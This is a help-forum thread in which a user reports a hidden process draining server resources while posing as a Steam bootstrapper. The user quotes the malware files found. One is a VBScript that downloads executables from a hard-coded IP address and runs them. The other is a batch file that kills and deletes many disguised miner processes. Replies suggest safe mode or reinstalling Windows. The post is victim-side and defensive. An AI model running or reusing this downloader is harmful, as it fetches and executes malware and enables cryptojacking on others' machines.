How to permanently kill steam client bootstrapper
I want to share a workaround that I found for my problem.
As a programmer, I've created a program that constantly monitors the folder c:\ProgramData\
for any new files. And if some of the files that belong to "steam client bootstrappper" appears inside of that folder, my program deletes those files before they will be executed. If anybody needs to modify this utility you can find it at GitHub.
After I've executed this primitive antivirus (actually antiPUP) my system stopped from being slow. One more detail that is required for this program to work with stability is the requirement to crate folder c:\ProgramData\copyForVirus\
. I've made the program to create a copy of those virus files in order to analyze them later in some more VM Ware environment for what are internals of those files.
![Yuriy Zaletskyy](https://i.stack.imgur.com/V0zui.jpg?s=256&g=1)
Yuriy Zaletskyy
Updated on September 18, 2022Comments
-
Yuriy Zaletskyy almost 2 years
I have the following situation in my task manager:
I don't know what kind of app it is, but definitely not Steam client bootstrapper because I didn't install it and also can't uninstall it.
If I try to figure out what kind of app it is via this step:
I see something like this:
In MS Config utility I didn't find anything that looks like
secury.exe
.When I open the file location, I see three files:
m.bat
,b.exe
,4.vbs
.Below goes the content of
m.bat
:taskkill /f /t /im secury.exe c:\ProgramData\secury.exe taskkill /f /t /im kingsoft.exe taskkill /f /t /im expl0rer.exe taskkill /f /t /im ieplare.exev taskkill /f /t /im nssm.exe taskkill /f /t /im MSASCui.exe taskkill /f /t /im SystemSettlngs.exe taskkill /f /t /im SystemSetting.exe taskkill /f /t /im Process.exe taskkill /f /t /im winlnlt.exe taskkill /f /t /im WindowsUpgrade.exe taskkill /f /t /im msdc.exe taskkill /f /t /im Fiddlere.exe taskkill /f /t /im shovst.exe taskkill /f /t /im lqrtqe.exe taskkill /f /t /im apkls.exe taskkill /f /t /im winlog.exe taskkill /f /t /im svchosts.exe taskkill /f /t /im win1ogins.exe taskkill /f /t /im shovsts.exe taskkill /f /t /im fcty.exe taskkill /f /t /im soiuos.exe taskkill /f /t /im TrustedInstaller.exe del C:\Windows\System32\soiuos.exe del C:\Windows\Setup\TrustedInstaller.exe del C:\ProgramData\kingsoft.exe del C:\ProgramData\expl0rer.exe del C:\ProgramData\ieplare.exe del C:\ProgramData\nssm.exe del C:\ProgramData\MSASCui.exe del C:\ProgramData\SystemSettlngs.exe del C:\ProgramData\SystemSetting.exe del C:\ProgramData\Process.exe del C:\ProgramData\winlnlt.exe del C:\ProgramData\WindowsUpgrade.exe del C:\ProgramData\msdc.exe del C:\ProgramData\Fiddlere.exe del C:\ProgramData\shovst.exe del C:\ProgramData\lqrtqe.exe del C:\ProgramData\apkls.exe del C:\ProgramData\winlog.exe del C:\ProgramData\svchosts.exe del C:\ProgramData\win1ogins.exe del C:\ProgramData\shovsts.exe del C:\ProgramData\fcty.exe del C:\ProgramData\pool.exe del C:\ProgramData\pool2.exe del C:\ProgramData\pool3.exe
Next goes
4.vbs
:Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://223.68.209.7:65510/2.exe",0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "c:\ProgramData\s2.exe",2 Set xPost = CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://223.68.209.7:65510/pool.exe",0 xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "c:\ProgramData\pool2.exe",2 CreateObject("WScript.Shell").Run "C:\ProgramData\pool3.exe" CreateObject("WScript.Shell").Run "del C:\ProgramData\pool3.exe"
What can I do in order to stop
secury.exe
from abusing computing powers of my server?P.S. I've executed Avast full check of my computer, but it didn't find anything wrong.
-
Admin over 6 yearsThat... looks awfully suspicious (the content of those batch files and the VBS). Any chance of you going into safe mode (and hopefully that thing is not running) and then you can try to delete them? If safe mode is not an option - boot from an external drive (or Linux LiveUSB/LiveCD) and with the HDD accessible - delete those files?
-
Admin over 6 yearsAt this point you should assume that your computer has been completely compromised. You could run a number of virus checkers and pray that they've worked - but I'd recommend backing up everything of importance and then formatting and reinstalling Windows.
-
Admin over 6 yearsI deleted those files many times, but it didn't work
-